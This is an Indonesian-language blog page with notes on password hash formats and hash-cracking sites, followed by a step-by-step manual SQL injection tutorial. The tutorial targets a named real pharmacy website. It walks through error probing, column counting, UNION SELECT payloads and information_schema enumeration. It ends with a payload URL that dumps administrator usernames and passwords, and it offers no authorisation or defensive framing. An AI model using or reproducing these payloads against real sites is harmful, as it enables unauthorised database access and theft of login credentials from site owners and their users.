- hashnya oleh tanda $H$ lalu dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah nomor "9"), kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") kemudian dilanjutkan oleh hashnya
- contoh : $H$9123456785DAERgALpsri.D9z3ht120

7.SHA-1(Secure Hash Algorithm)
=> diciptakan oleh National Institue of Standars and Technology atau U.S. Federal Information Processing Standard
digunakan oleh beberapa CMS dan beberapa forum
- panjangnya 20 bytes (40 karakter)
- contoh : 356a192b7913b04c54574d18c28d46e6395428ab

8.SHA-256(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $5$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") lalu dilanjutkan oleh karakter "$" kemudian dilanjutkan oleh hashnya
- panjang 55 karakter
- contoh : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi...

9.SHA-512(Secure Hash Algorithm)
=> hashnya dimulai oleh tanda $6$ kemudian dilanjutkan dengan saltnya (8 karakter yg disusun secara acak, dalam contoh yg saya berikan saltnya adalah "12345678") lalu dilanjutkan oleh karakter "$" kemudian dilanjutkan oleh hashnya
- panjang 98 karakter
- contoh : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm...

10.Base64
=> algoritma yg berfungsi untuk encoding dan decoding suatu data ke dalam format ASCII. panjang maksimal 64 karakter hashnya terdiri dari A..Z, a..z dan 0..9, serta ditambah dengan dua karakter terakhir yang bersimbol yaitu + dan / serta satu buah karakter sama dengan "="
- digunakan di beberapa forum dan CMS
- contoh : Y3liZXJfY3JpbWluYWw=

situs untuk crack hash :
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
dan masih banyak lagi

Selasa, 26 November 2013

SQLi Pake Jari

Target => http://www.superpharm.co.tt/test-detail.php?id=2

kasih tanya petik satu ==> http://www.superpharm.co.tt/test-detail.php?id='2 muncul error

sekarang cari kolum nya dengan menambahkan +order+by+1--+- jadinya seperti ini ==>

(tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+1--+-
(tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+2--+-
(tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+3--+-
(tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+4--+-
(Nah ini error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+5--+-

ini menunjukan kolom nya cuma ada 4

ok lanjut sekarang mencari angka injeksi caranya dengan memberi tanda - sebelum angka id jadinya begini karena tadi ditemukan kolumnya ada 4 maka jadinya kek bgini

http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,2,3,4--+

nah nongol tuh angka injeksi

sekarang karena angka injeksi 2 maka cara nampilin data melalui sqlnya kek begini

http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28table_name%29,3,4+from+information_schema.tables+where+table_schema=database%28%29--


nah tampil tuh banyak data basenya tapi untuk menuju ke admin berbau username dan password biasanya di administrators pilih deh

caranya kek begini kaka masuk ke ==> http://www.branah.com/ascii-converter

lalu masukin administrators ==> add space == pilih yg desimal

administrators = 97 100 109 105 110 105 115 116 114 97 116 111 114 115

ok lanjut setelah itu

buat seperti ini di notepad CHAR(97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 115)



Rubah ==> database() ==> CHAR(97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 115)
Rubah ==> group_concat(table_name) ==> group_concat(column_name)
Rubah ==> information_schema.tables ==> information_schema.columns
Rubah ==> table_schema ==> table_name

jadinya seperti ini

http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28column_name%29,3,4+from+information_schema.columns+where+table_name=CHAR%2897,%20100,%20109,%20105,%20110,%20105,%20115,%20116,%20114,%2097,%20116,%20111,%20114,%20115%29--+


ok setelah itu tinggal nampilin username sama passwordnya

http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28user_name,0x3a,user_password%29,3,4+from+administrators